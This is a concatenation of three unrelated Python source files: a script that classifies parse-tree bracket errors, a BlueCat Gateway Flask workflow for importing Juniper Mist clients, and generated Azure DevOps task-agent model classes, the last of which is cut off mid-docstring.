def detect_error_types(error_set, gold_tree, test_tree):
init_error_count = len(error_set['miss']) + len(error_set['extra'])
ungrouped = []
for etype in error_set:
for error in error_set[etype]:
ungrouped.append(error)
bracket_errors.sort_by_depth(ungrouped)
init_ungrouped_length = len(ungrouped)
assert init_ungrouped_length == init_error_count
grouped = []
mutable_test = test_tree.copy()
# iterate through the errors until there is no change after an iteration
# Note - order of these is intentional
aggregators = [
s_unary.unary_error,
s_single_word.single_word_error,
s_attachment.attachment_error,
]
changed = True
while changed:
changed = False
### print mutable_test.colour_repr()
### for error in ungrouped:
### print error
### print
for func in aggregators:
plen = len(ungrouped), len(grouped)
tchanged, mutable_test = func(ungrouped, grouped, gold_tree, mutable_test)
if tchanged:
mutable_test = check_for_matching_errors(ungrouped, grouped[-1], gold_tree, mutable_test)
changed = True
remaining_errors = bracket_errors.get_errors(gold_tree, mutable_test)
return grouped, mutable_test, remaining_errors, ungrouped
def aggregate_error_types(groups):
# Further grouping the errors detected in the function above
counts = {'new Other': [0, 0, []]}
print "Aggregated errors"
for group in groups:
if group.classification is None:
group.determine_type()
if group.classification not in counts:
counts[group.classification] = [0, 0, []]
counts[group.classification][0] += 1
counts[group.classification][1] += len(group.errors)
counts[group.classification][2].append(group)
if 'new' not in group.classification:
counts['new Other'][0] += 1
counts['new Other'][1] += len(group.errors)
counts['new Other'][2].append(group)
stats = []
for count in counts:
stats.append((counts[count][0], count))
stats.sort()
for stat in stats:
print 'Aggregated Errors:',
print stat[0],
print stat[1],
print ' | ',
print counts[stat[1]][1] / float(stat[0]),
print counts[stat[1]][1]
if __name__ == '__main__':
if len(sys.argv) < 3:
print "Usage:\n%s <gold> <test>" % sys.argv[0]
print "The files should contain one parse per line, with a 1-1 mapping (use blank lines where there is a missing parse)."
print "Running doctest"
import doctest
doctest.testmod()
else:
gold_in = open(sys.argv[1])
test_in = open(sys.argv[2])
VERBOSE = len(sys.argv) > 3 and ('-v' in sys.argv[3] or '-V' in sys.argv[3])
error_groups = []
while True:
gold_text = gold_in.readline()
test_text = test_in.readline()
if gold_text == '' or test_text == '':
break
gold_text = gold_text.strip()
test_text = test_text.strip()
if len(gold_text) == 0 or len(test_text) == 0:
continue
if VERBOSE:
print gold_text
tree = ptb.PTB_Tree()
tree.set_by_text(gold_text)
if VERBOSE:
print tree
simple_tree = ptb.apply_collins_rules(tree)
if VERBOSE:
print simple_tree
if simple_tree is None:
continue
gold_tree = error_tree.Error_Tree()
gold_tree.set_by_ptb(simple_tree, tree)
if VERBOSE:
print gold_tree
if VERBOSE:
print test_text
tree = ptb.PTB_Tree()
tree.set_by_text(test_text)
if VERBOSE:
print tree
simple_tree = ptb.apply_collins_rules(tree)
if VERBOSE:
print simple_tree
test_tree = error_tree.Error_Tree()
test_tree.set_by_ptb(simple_tree, tree)
if VERBOSE:
print test_tree
gold_words = gold_tree.word_yield()
test_words = test_tree.word_yield()
if len(test_words.split()) != len(gold_words.split()):
print "Sentence lengths do not maych..."
print "Gold:", gold_words
print "Test:", test_words
error_set = bracket_errors.get_errors(gold_tree, test_tree)[0]
missing = bracket_errors.get_missing_errors(error_set, test_tree)
print test_tree.colour_repr(missing=missing).strip()
if len(error_set['miss']) > 0 or len(error_set['extra']) > 0:
print 'initial errors:', len(error_set['miss']), len(error_set['extra'])
aggregated_errors = detect_error_types(error_set, gold_tree, test_tree)
for group in aggregated_errors[0]:
group.determine_type()
print 'Class:', group.classification
print 'Fixes:',
for error in group.errors:
print error
error_groups.append(group)
error_set = bracket_errors.get_errors(gold_tree, aggregated_errors[1])[0]
missing = bracket_errors.get_missing_errors(error_set, aggregated_errors[1])
print 'remaining errors:', len(error_set['miss']), len(error_set['extra'])
for etype in error_set:
for error in error_set[etype]:
print "Error:", etype, error.node.label
group = error_group.Error_Group()
group.fields = {}
group.fields['old desc'] = "%s %s" % (etype, error.node.label)
group.desc = group.fields['old desc']
group.errors.append(error)
error_groups.append(group)
print aggregated_errors[1].colour_repr(missing=missing).strip()
print
aggregate_error_types(error_groups)
# Tricky sentence:
# The move leaves United Illuminating Co. and Northeast Utilities...
#
# TODO: It would be interesting to have a list of the phrases that form errors,
# in particular the missing constituents. The question is, why is this a
# constituent? Is it something you need world knowledge for?
|
# Copyright 2020 BlueCat Networks (USA) Inc. and its affiliates
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# By: Akira Goto ([email protected])
# Date: 2019-10-30
# Gateway Version: 19.8.1
# Description: Juniper Mist Importer page.py
# Various Flask framework items.
import os
import sys
import codecs
from flask import request, url_for, redirect, render_template, flash, g, jsonify
from wtforms.validators import URL, DataRequired
from wtforms import StringField, BooleanField, SubmitField
from bluecat.wtform_extensions import GatewayForm
from bluecat import route, util
import config.default_config as config
from main_app import app
from .mist_importer import MistImporter
def module_path():
encoding = sys.getfilesystemencoding()
return os.path.dirname(os.path.abspath(__file__))
def get_configuration():
configuration = None
if g.user:
configuration = g.user.get_api().get_configuration(config.default_configuration)
return configuration
class GenericFormTemplate(GatewayForm):
"""
Generic form Template
Note:
When updating the form, remember to make the corresponding changes to the workflow pages
"""
workflow_name = 'mist_importer'
workflow_permission = 'mist_importer_page'
text=util.get_text(module_path(), config.language)
require_message=text['require_message']
org_id = StringField(
label=text['label_org_id'],
validators=[DataRequired(message=require_message)]
)
api_token = StringField(
label=text['label_api_token'],
validators=[DataRequired(message=require_message)]
)
site_name = StringField(
label=text['label_site_name'],
validators=[DataRequired(message=require_message)]
)
include_matches = BooleanField(
label='',
default='checked'
)
include_ipam_only = BooleanField(
label='',
default='checked'
)
submit = SubmitField(label=text['label_submit'])
# The workflow name must be the first part of any endpoints defined in this file.
# If you break this rule, you will trip up on other people's endpoint names and
# chaos will ensue.
@route(app, '/mist_importer/mist_importer_endpoint')
@util.workflow_permission_required('mist_importer_page')
@util.exception_catcher
def mist_importer_mist_importer_page():
form = GenericFormTemplate()
mist_importer = MistImporter.get_instance(debug=True)
value = mist_importer.get_value('org_id')
if value is not None:
form.org_id.data = value
value = mist_importer.get_value('api_token')
if value is not None:
form.api_token.data = value
value = mist_importer.get_value('site_name')
if value is not None:
form.site_name.data = value
value = mist_importer.get_value('include_matches')
if value is not None:
form.include_matches.data = value
value = mist_importer.get_value('include_ipam_only')
if value is not None:
form.include_ipam_only.data = value
return render_template(
'mist_importer_page.html',
form=form,
text=util.get_text(module_path(), config.language),
options=g.user.get_options(),
)
@route(app, '/mist_importer/load_col_model')
@util.workflow_permission_required('mist_importer_page')
@util.exception_catcher
def load_col_model():
text=util.get_text(module_path(), config.language)
links = '<img src="{icon}" title="{title}" width="16" height="16">'
value_table = {
'UNKNOWN': links.format(icon='img/help.gif', title=text['label_state_unknown']),
'MATCH': links.format(icon='img/check.gif', title=text['label_state_match']),
'MISMATCH': links.format(icon='img/about.gif', title=text['label_state_mismatch']),
'RECLAIM': links.format(icon='img/data_delete.gif', title=text['label_state_reclaim'])
}
clients = [
{'index':'id', 'name':'id', 'hidden':True, 'sortable':False},
{'index':'network_id', 'name':'network_id', 'hidden':True, 'sortable':False},
{'index':'order', 'name':'order', 'hidden':True, 'sortable':False},
{'index':'name', 'name':'name', 'hidden':True, 'sortable':False},
{'index':'system', 'name':'system', 'hidden':True, 'sortable':False},
{'index':'detail_link', 'name':'detail_link', 'hidden':True, 'sortable':False},
{
'label': text['label_col_ipaddr'], 'index':'ipaddr', 'name':'ipaddr',
'width':100, 'align':'center', 'sortable':False
},
{
'label': text['label_col_macaddr'], 'index':'macaddr', 'name':'macaddr',
'width':130, 'align':'center', 'sortable':False
},
{
'label': text['label_col_name'], 'index':'linked_name', 'name':'linked_name',
'width':140, 'sortable':False
},
{
'label': text['label_col_system'], 'index':'system', 'name':'system',
'width':240, 'sortable':False
},
{
'label': text['label_col_state'], 'index':'state', 'name':'state',
'width':50, 'align':'center', 'sortable':False,
'formatter': 'select',
'formatoptions': {
'value': value_table
}
},
{
'label': text['label_col_lastfound'], 'index':'last_found', 'name':'last_found',
'width':140, 'align':'center', 'sortable':False,
'formatter': 'date',
'formatoptions': {
'srcformat': 'ISO8601Long',
'newformat': 'Y-m-d H:i:s',
'userLocalTime': True
}
}
]
return jsonify(clients)
@route(app, '/mist_importer/get_clients')
@util.workflow_permission_required('mist_importer_page')
@util.exception_catcher
def get_clients():
clients = []
configuration = get_configuration()
if configuration is not None:
mist_importer = MistImporter.get_instance()
mist_importer.collect_clients(configuration)
clients = mist_importer.get_clients()
return jsonify(clients)
@route(app, '/mist_importer/load_clients')
@util.workflow_permission_required('mist_importer_page')
@util.exception_catcher
def load_clients():
mist_importer = MistImporter.get_instance()
clients = mist_importer.get_clients()
return jsonify(clients)
@route(app, '/mist_importer/update_config', methods=['POST'])
@util.workflow_permission_required('mist_importer_page')
@util.exception_catcher
def update_config():
config = request.get_json()
mist_importer = MistImporter.get_instance()
mist_importer.set_value('org_id', config['org_id'])
mist_importer.set_value('api_token', config['api_token'])
mist_importer.set_value('site_name', config['site_name'])
mist_importer.set_value('include_matches', config['include_matches'])
mist_importer.set_value('include_ipam_only', config['include_ipam_only'])
mist_importer.save()
return jsonify(success=True)
@route(app, '/mist_importer/push_selected_clients', methods=['POST'])
@util.workflow_permission_required('mist_importer_page')
@util.exception_catcher
def push_selected_clients():
new_clients = []
client_ids = request.get_json()
mist_importer = MistImporter.get_instance()
for client in mist_importer.get_clients():
if client['id'] in client_ids:
new_clients.append(client)
mist_importer.set_clients(new_clients)
return jsonify(success=True)
@route(app, '/mist_importer/clear_clients', methods=['POST'])
@util.workflow_permission_required('mist_importer_page')
@util.exception_catcher
def clear_clients():
mist_importer = MistImporter.get_instance()
mist_importer.clear_clients()
return jsonify(success=True)
@route(app, '/mist_importer/form', methods=['POST'])
@util.workflow_permission_required('mist_importer_page')
@util.exception_catcher
def mist_importer_mist_importer_page_form():
form = GenericFormTemplate()
text=util.get_text(module_path(), config.language)
if form.validate_on_submit():
mist_importer = MistImporter.get_instance()
mist_importer.set_value('org_id', form.org_id.data)
mist_importer.set_value('api_token', form.api_token.data)
mist_importer.set_value('site_name', form.site_name.data)
mist_importer.set_value('include_matches', form.include_matches.data)
mist_importer.set_value('include_ipam_only', form.include_ipam_only.data)
mist_importer.save()
configuration = get_configuration()
mist_importer.import_clients(configuration)
mist_importer.collect_clients(configuration)
# Put form processing code here
g.user.logger.info('SUCCESS')
flash(text['imported_message'], 'succeed')
return redirect(url_for('mist_importermist_importer_mist_importer_page'))
else:
g.user.logger.info('Form data was not valid.')
return render_template(
'mist_importer_page.html',
form=form,
text=util.get_text(module_path(), config.language),
options=g.user.get_options(),
)
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from msrest.serialization import Model
class AadOauthTokenRequest(Model):
"""
:param refresh:
:type refresh: bool
:param resource:
:type resource: str
:param tenant_id:
:type tenant_id: str
:param token:
:type token: str
"""
_attribute_map = {
'refresh': {'key': 'refresh', 'type': 'bool'},
'resource': {'key': 'resource', 'type': 'str'},
'tenant_id': {'key': 'tenantId', 'type': 'str'},
'token': {'key': 'token', 'type': 'str'}
}
def __init__(self, refresh=None, resource=None, tenant_id=None, token=None):
super(AadOauthTokenRequest, self).__init__()
self.refresh = refresh
self.resource = resource
self.tenant_id = tenant_id
self.token = token
class AadOauthTokenResult(Model):
"""
:param access_token:
:type access_token: str
:param refresh_token_cache:
:type refresh_token_cache: str
"""
_attribute_map = {
'access_token': {'key': 'accessToken', 'type': 'str'},
'refresh_token_cache': {'key': 'refreshTokenCache', 'type': 'str'}
}
def __init__(self, access_token=None, refresh_token_cache=None):
super(AadOauthTokenResult, self).__init__()
self.access_token = access_token
self.refresh_token_cache = refresh_token_cache
class AuthenticationSchemeReference(Model):
"""
:param inputs:
:type inputs: dict
:param type:
:type type: str
"""
_attribute_map = {
'inputs': {'key': 'inputs', 'type': '{str}'},
'type': {'key': 'type', 'type': 'str'}
}
def __init__(self, inputs=None, type=None):
super(AuthenticationSchemeReference, self).__init__()
self.inputs = inputs
self.type = type
class AuthorizationHeader(Model):
"""
:param name: Gets or sets the name of authorization header.
:type name: str
:param value: Gets or sets the value of authorization header.
:type value: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'}
}
def __init__(self, name=None, value=None):
super(AuthorizationHeader, self).__init__()
self.name = name
self.value = value
class AzureManagementGroup(Model):
"""
Azure Management Group
:param display_name: Display name of azure management group
:type display_name: str
:param id: Id of azure management group
:type id: str
:param name: Azure management group name
:type name: str
:param tenant_id: Id of tenant from which azure management group belongs
:type tenant_id: str
"""
_attribute_map = {
'display_name': {'key': 'displayName', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'tenant_id': {'key': 'tenantId', 'type': 'str'}
}
def __init__(self, display_name=None, id=None, name=None, tenant_id=None):
super(AzureManagementGroup, self).__init__()
self.display_name = display_name
self.id = id
self.name = name
self.tenant_id = tenant_id
class AzureManagementGroupQueryResult(Model):
"""
Azure management group query result
:param error_message: Error message in case of an exception
:type error_message: str
:param value: List of azure management groups
:type value: list of :class:`AzureManagementGroup <azure.devops.v5_1.task_agent.models.AzureManagementGroup>`
"""
_attribute_map = {
'error_message': {'key': 'errorMessage', 'type': 'str'},
'value': {'key': 'value', 'type': '[AzureManagementGroup]'}
}
def __init__(self, error_message=None, value=None):
super(AzureManagementGroupQueryResult, self).__init__()
self.error_message = error_message
self.value = value
class AzureSubscription(Model):
"""
:param display_name:
:type display_name: str
:param subscription_id:
:type subscription_id: str
:param subscription_tenant_id:
:type subscription_tenant_id: str
:param subscription_tenant_name:
:type subscription_tenant_name: str
"""
_attribute_map = {
'display_name': {'key': 'displayName', 'type': 'str'},
'subscription_id': {'key': 'subscriptionId', 'type': 'str'},
'subscription_tenant_id': {'key': 'subscriptionTenantId', 'type': 'str'},
'subscription_tenant_name': {'key': 'subscriptionTenantName', 'type': 'str'}
}
def __init__(self, display_name=None, subscription_id=None, subscription_tenant_id=None, subscription_tenant_name=None):
super(AzureSubscription, self).__init__()
self.display_name = display_name
self.subscription_id = subscription_id
self.subscription_tenant_id = subscription_tenant_id
self.subscription_tenant_name = subscription_tenant_name
class AzureSubscriptionQueryResult(Model):
"""
:param error_message:
:type error_message: str
:param value:
:type value: list of :class:`AzureSubscription <azure.devops.v5_1.task_agent.models.AzureSubscription>`
"""
_attribute_map = {
'error_message': {'key': 'errorMessage', 'type': 'str'},
'value': {'key': 'value', 'type': '[AzureSubscription]'}
}
def __init__(self, error_message=None, value=None):
super(AzureSubscriptionQueryResult, self).__init__()
self.error_message = error_message
self.value = value
class ClientCertificate(Model):
"""
:param value: Gets or sets the value of client certificate.
:type value: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': 'str'}
}
def __init__(self, value=None):
super(ClientCertificate, self).__init__()
self.value = value
class DataSource(Model):
"""
:param authentication_scheme:
:type authentication_scheme: :class:`AuthenticationSchemeReference <azure.devops.v5_1.task_agent.models.AuthenticationSchemeReference>`
:param endpoint_url:
:type endpoint_url: str
:param headers:
:type headers: list of :class:`AuthorizationHeader <azure.devops.v5_1.task_agent.models.AuthorizationHeader>`
:param name:
:type name: str
:param resource_url:
:type resource_url: str
:param result_selector:
:type result_selector: str
"""
_attribute_map = {
'authentication_scheme': {'key': 'authenticationScheme', 'type': 'AuthenticationSchemeReference'},
'endpoint_url': {'key': 'endpointUrl', 'type': 'str'},
'headers': {'key': 'headers', 'type': '[AuthorizationHeader]'},
'name': {'key': 'name', 'type': 'str'},
'resource_url': {'key': 'resourceUrl', 'type': 'str'},
'result_selector': {'key': 'resultSelector', 'type': 'str'}
}
def __init__(self, authentication_scheme=None, endpoint_url=None, headers=None, name=None, resource_url=None, result_selector=None):
super(DataSource, self).__init__()
self.authentication_scheme = authentication_scheme
self.endpoint_url = endpoint_url
self.headers = headers
self.name = name
self.resource_url = resource_url
self.result_selector = result_selector
class DataSourceBindingBase(Model):
"""
Represents binding of data source for the service endpoint request.
:param callback_context_template: Pagination format supported by this data source(ContinuationToken/SkipTop).
:type callback_context_template: str
:param callback_required_template: Subsequent calls needed?
:type callback_required_template: str
:param data_source_name: Gets or sets the name of the data source.
:type data_source_name: str
:param endpoint_id: Gets or sets the endpoint Id.
:type endpoint_id: str
:param endpoint_url: Gets or sets the url of the service endpoint.
:type endpoint_url: str
:param headers: Gets or sets the authorization headers.
:type headers: list of :class:`AuthorizationHeader <azure.devops.v5_1.microsoft._team_foundation._distributed_task._common._contracts.models.AuthorizationHeader>`
:param initial_context_template: Defines the initial value of the query params
:type initial_context_template: str
:param parameters: Gets or sets the parameters for the data source.
:type parameters: dict
:param request_content: Gets or sets http request body
:type request_content: str
:param request_verb: Gets or sets http request verb
:type request_verb: str
:param result_selector: Gets or sets the result selector.
:type result_selector: str
:param result_template: Gets or sets the result template.
:type result_template: str
:param target: Gets or sets the target of the data source.
:type target: str
"""
_attribute_map = {
'callback_context_template': {'key': 'callbackContextTemplate', 'type': 'str'},
'callback_required_template': {'key': 'callbackRequiredTemplate', 'type': 'str'},
'data_source_name': {'key': 'dataSourceName', 'type': 'str'},
'endpoint_id': {'key': 'endpointId', 'type': 'str'},
'endpoint_url': {'key': 'endpointUrl', 'type': 'str'},
'headers': {'key': 'headers', 'type': '[AuthorizationHeader]'},
'initial_context_template': {'key': 'initialContextTemplate', 'type': 'str'},
'parameters': {'key': 'parameters', 'type': '{str}'},
'request_content': {'key': 'requestContent', 'type': 'str'},
'request_verb': {'key': 'requestVerb', 'type': 'str'},
'result_selector': {'key': 'resultSelector', 'type': 'str'},
'result_template': {'key': 'resultTemplate', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'}
}
def __init__(self, callback_context_template=None, callback_required_template=None, data_source_name=None, endpoint_id=None, endpoint_url=None, headers=None, initial_context_template=None, parameters=None, request_content=None, request_verb=None, result_selector=None, result_template=None, target=None):
super(DataSourceBindingBase, self).__init__()
self.callback_context_template = callback_context_template
self.callback_required_template = callback_required_template
self.data_source_name = data_source_name
self.endpoint_id = endpoint_id
self.endpoint_url = endpoint_url
self.headers = headers
self.initial_context_template = initial_context_template
self.parameters = parameters
self.request_content = request_content
self.request_verb = request_verb
self.result_selector = result_selector
self.result_template = result_template
self.target = target
class DataSourceDetails(Model):
"""
:param data_source_name:
:type data_source_name: str
:param data_source_url:
:type data_source_url: str
:param headers:
:type headers: list of :class:`AuthorizationHeader <azure.devops.v5_1.task_agent.models.AuthorizationHeader>`
:param parameters:
:type parameters: dict
:param resource_url:
:type resource_url: str
:param result_selector:
:type result_selector: str
"""
_attribute_map = {
'data_source_name': {'key': 'dataSourceName', 'type': 'str'},
'data_source_url': {'key': 'dataSourceUrl', 'type': 'str'},
'headers': {'key': 'headers', 'type': '[AuthorizationHeader]'},
'parameters': {'key': 'parameters', 'type': '{str}'},
'resource_url': {'key': 'resourceUrl', 'type': 'str'},
'result_selector': {'key': 'resultSelector', 'type': 'str'}
}
def __init__(self, data_source_name=None, data_source_url=None, headers=None, parameters=None, resource_url=None, result_selector=None):
super(DataSourceDetails, self).__init__()
self.data_source_name = data_source_name
self.data_source_url = data_source_url
self.headers = headers
self.parameters = parameters
self.resource_url = resource_url
self.result_selector = result_selector
class DependencyBinding(Model):
"""
:param key:
:type key: str
:param value:
:type value: str
"""
_attribute_map = {
'key': {'key': 'key', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'}
}
def __init__(self, key=None, value=None):
super(DependencyBinding, self).__init__()
self.key = key
self.value = value
class DependencyData(Model):
"""
:param input:
:type input: str
:param map:
:type map: list of { key: str; value: [{ key: str; value: str }] }
"""
_attribute_map = {
'input': {'key': 'input', 'type': 'str'},
'map': {'key': 'map', 'type': '[{ key: str; value: [{ key: str; value: str }] }]'}
}
def __init__(self, input=None, map=None):
super(DependencyData, self).__init__()
self.input = input
self.map = map
class DependsOn(Model):
"""
:param input:
:type input: str
:param map:
:type map: list of :class:`DependencyBinding <azure.devops.v5_1.task_agent.models.DependencyBinding>`
"""
_attribute_map = {
'input': {'key': 'input', 'type': 'str'},
'map': {'key': 'map', 'type': '[DependencyBinding]'}
}
def __init__(self, input=None, map=None):
super(DependsOn, self).__init__()
self.input = input
self.map = map
class DeploymentGroupCreateParameter(Model):
"""
Properties to create Deployment group.
:param description: Description of the deployment group.
:type description: str
:param name: Name of the deployment group.
:type name: str
:param pool: Deployment pool in which deployment agents are registered. This is obsolete. Kept for compatibility. Will be marked obsolete explicitly by M132.
:type pool: :class:`DeploymentGroupCreateParameterPoolProperty <azure.devops.v5_1.task_agent.models.DeploymentGroupCreateParameterPoolProperty>`
:param pool_id: Identifier of the deployment pool in which deployment agents are registered.
:type pool_id: int
"""
_attribute_map = {
'description': {'key': 'description', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'pool': {'key': 'pool', 'type': 'DeploymentGroupCreateParameterPoolProperty'},
'pool_id': {'key': 'poolId', 'type': 'int'}
}
def __init__(self, description=None, name=None, pool=None, pool_id=None):
super(DeploymentGroupCreateParameter, self).__init__()
self.description = description
self.name = name
self.pool = pool
self.pool_id = pool_id
class DeploymentGroupCreateParameterPoolProperty(Model):
"""
Properties of Deployment pool to create Deployment group.
:param id: Deployment pool identifier.
:type id: int
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'int'}
}
def __init__(self, id=None):
super(DeploymentGroupCreateParameterPoolProperty, self).__init__()
self.id = id
class DeploymentGroupMetrics(Model):
"""
Deployment group metrics.
:param columns_header: List of deployment group properties. And types of metrics provided for those properties.
:type columns_header: :class:`MetricsColumnsHeader <azure.devops.v5_1.task_agent.models.MetricsColumnsHeader>`
:param deployment_group: Deployment group.
:type deployment_group: :class:`DeploymentGroupReference <azure.devops.v5_1.task_agent.models.DeploymentGroupReference>`
:param rows: Values of properties and the metrics. E.g. 1: total count of deployment targets for which 'TargetState' is 'offline'. E.g. 2: Average time of deployment to the deployment targets for which 'LastJobStatus' is 'passed' and 'TargetState' is 'online'.
:type rows: list of :class:`MetricsRow <azure.devops.v5_1.task_agent.models.MetricsRow>`
"""
_attribute_map = {
'columns_header': {'key': 'columnsHeader', 'type': 'MetricsColumnsHeader'},
'deployment_group': {'key': 'deploymentGroup', 'type': 'DeploymentGroupReference'},
'rows': {'key': 'rows', 'type': '[MetricsRow]'}
}
def __init__(self, columns_header=None, deployment_group=None, rows=None):
super(DeploymentGroupMetrics, self).__init__()
self.columns_header = columns_header
self.deployment_group = deployment_group
self.rows = rows
class DeploymentGroupReference(Model):
"""
Deployment group reference. This is useful for referring a deployment group in another object.
:param id: Deployment group identifier.
:type id: int
:param name: Name of the deployment group.
:type name: str
:param pool: Deployment pool in which deployment agents are registered.
:type pool: :class:`TaskAgentPoolReference <azure.devops.v5_1.task_agent.models.TaskAgentPoolReference>`
:param project: Project to which the deployment group belongs.
:type project: :class:`ProjectReference <azure.devops.v5_1.task_agent.models.ProjectReference>`
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'},
'pool': {'key': 'pool', 'type': 'TaskAgentPoolReference'},
'project': {'key': 'project', 'type': 'ProjectReference'}
}
def __init__(self, id=None, name=None, pool=None, project=None):
super(DeploymentGroupReference, self).__init__()
self.id = id
self.name = name
self.pool = pool
self.project = project
class DeploymentGroupUpdateParameter(Model):
"""
Deployment group update parameter.
:param description: Description of the deployment group.
:type description: str
:param name: Name of the deployment group.
:type name: str
"""
_attribute_map = {
'description': {'key': 'description', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'}
}
def __init__(self, description=None, name=None):
super(DeploymentGroupUpdateParameter, self).__init__()
self.description = description
self.name = name
class DeploymentMachine(Model):
"""
Deployment target.
:param agent: Deployment agent.
:type agent: :class:`TaskAgent <azure.devops.v5_1.task_agent.models.TaskAgent>`
:param id: Deployment target Identifier.
:type id: int
:param properties: Properties of the deployment target.
:type properties: :class:`object <azure.devops.v5_1.task_agent.models.object>`
:param tags: Tags of the deployment target.
:type tags: list of str
"""
_attribute_map = {
'agent': {'key': 'agent', 'type': 'TaskAgent'},
'id': {'key': 'id', 'type': 'int'},
'properties': {'key': 'properties', 'type': 'object'},
'tags': {'key': 'tags', 'type': '[str]'}
}
def __init__(self, agent=None, id=None, properties=None, tags=None):
super(DeploymentMachine, self).__init__()
self.agent = agent
self.id = id
self.properties = properties
self.tags = tags
class DeploymentMachineGroupReference(Model):
"""
:param id:
:type id: int
:param name:
:type name: str
:param pool:
:type pool: :class:`TaskAgentPoolReference <azure.devops.v5_1.task_agent.models.TaskAgentPoolReference>`
:param project:
:type project: :class:`ProjectReference <azure.devops.v5_1.task_agent.models.ProjectReference>`
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'},
'pool': {'key': 'pool', 'type': 'TaskAgentPoolReference'},
'project': {'key': 'project', 'type': 'ProjectReference'}
}
def __init__(self, id=None, name=None, pool=None, project=None):
super(DeploymentMachineGroupReference, self).__init__()
self.id = id
self.name = name
self.pool = pool
self.project = project
class DeploymentPoolSummary(Model):
"""
Deployment pool summary.
:param deployment_groups: List of deployment groups referring to the deployment pool.
:type deployment_groups: list of :class:`DeploymentGroupReference <azure.devops.v5_1.task_agent.models.DeploymentGroupReference>`
:param offline_agents_count: Number of deployment agents that are offline.
:type offline_agents_count: int
:param online_agents_count: Number of deployment agents that are online.
:type online_agents_count: int
:param pool: Deployment pool.
:type pool: :class:`TaskAgentPoolReference <azure.devops.v5_1.task_agent.models.TaskAgentPoolReference>`
:param resource: Virtual machine Resource referring in pool.
:type resource: :class:`EnvironmentResourceReference <azure.devops.v5_1.task_agent.models.EnvironmentResourceReference>`
"""
_attribute_map = {
'deployment_groups': {'key': 'deploymentGroups', 'type': '[DeploymentGroupReference]'},
'offline_agents_count': {'key': 'offlineAgentsCount', 'type': 'int'},
'online_agents_count': {'key': 'onlineAgentsCount', 'type': 'int'},
'pool': {'key': 'pool', 'type': 'TaskAgentPoolReference'},
'resource': {'key': 'resource', 'type': 'EnvironmentResourceReference'}
}
def __init__(self, deployment_groups=None, offline_agents_count=None, online_agents_count=None, pool=None, resource=None):
super(DeploymentPoolSummary, self).__init__()
self.deployment_groups = deployment_groups
self.offline_agents_count = offline_agents_count
self.online_agents_count = online_agents_count
self.pool = pool
self.resource = resource
class DeploymentTargetUpdateParameter(Model):
"""
Deployment target update parameter.
:param id: Identifier of the deployment target.
:type id: int
:param tags:
:type tags: list of str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'int'},
'tags': {'key': 'tags', 'type': '[str]'}
}
def __init__(self, id=None, tags=None):
super(DeploymentTargetUpdateParameter, self).__init__()
self.id = id
self.tags = tags
class EndpointAuthorization(Model):
"""
:param parameters: Gets or sets the parameters for the selected authorization scheme.
:type parameters: dict
:param scheme: Gets or sets the scheme used for service endpoint authentication.
:type scheme: str
"""
_attribute_map = {
'parameters': {'key': 'parameters', 'type': '{str}'},
'scheme': {'key': 'scheme', 'type': 'str'}
}
def __init__(self, parameters=None, scheme=None):
super(EndpointAuthorization, self).__init__()
self.parameters = parameters
self.scheme = scheme
class EndpointUrl(Model):
"""
Represents url of the service endpoint.
:param depends_on: Gets or sets the dependency bindings.
:type depends_on: :class:`DependsOn <azure.devops.v5_1.task_agent.models.DependsOn>`
:param display_name: Gets or sets the display name of service endpoint url.
:type display_name: str
:param help_text: Gets or sets the help text of service endpoint url.
:type help_text: str
:param is_visible: Gets or sets the visibility of service endpoint url.
:type is_visible: str
:param value: Gets or sets the value of service endpoint url.
:type value: str
"""
_attribute_map = {
'depends_on': {'key': 'dependsOn', 'type': 'DependsOn'},
'display_name': {'key': 'displayName', 'type': 'str'},
'help_text': {'key': 'helpText', 'type': 'str'},
'is_visible': {'key': 'isVisible', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'}
}
def __init__(self, depends_on=None, display_name=None, help_text=None, is_visible=None, value=None):
super(EndpointUrl, self).__init__()
self.depends_on = depends_on
self.display_name = display_name
self.help_text = help_text
self.is_visible = is_visible
self.value = value
class EnvironmentCreateParameter(Model):
"""
Properties to create Environment.
:param description: Description of the environment.
:type description: str
:param name: Name of the environment.
:type name: str
"""
_attribute_map = {
'description': {'key': 'description', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'}
}
def __init__(self, description=None, name=None):
super(EnvironmentCreateParameter, self).__init__()
self.description = description
self.name = name
class EnvironmentDeploymentExecutionRecord(Model):
"""
EnvironmentDeploymentExecutionRecord.
:param definition: Definition of the environment deployment execution owner
:type definition: :class:`TaskOrchestrationOwner <azure.devops.v5_1.task_agent.models.TaskOrchestrationOwner>`
:param environment_id: Id of the Environment
:type environment_id: int
:param finish_time: Finish time of the environment deployment execution
:type finish_time: datetime
:param id: Id of the Environment deployment execution history record
:type id: long
:param job_attempt: Job Attempt
:type job_attempt: int
:param job_name: Job name
:type job_name: str
:param owner: Owner of the environment deployment execution record
:type owner: :class:`TaskOrchestrationOwner <azure.devops.v5_1.task_agent.models.TaskOrchestrationOwner>`
:param plan_id: Plan Id
:type plan_id: str
:param plan_type: Plan type of the environment deployment execution record
:type plan_type: str
:param queue_time: Queue time of the environment deployment execution
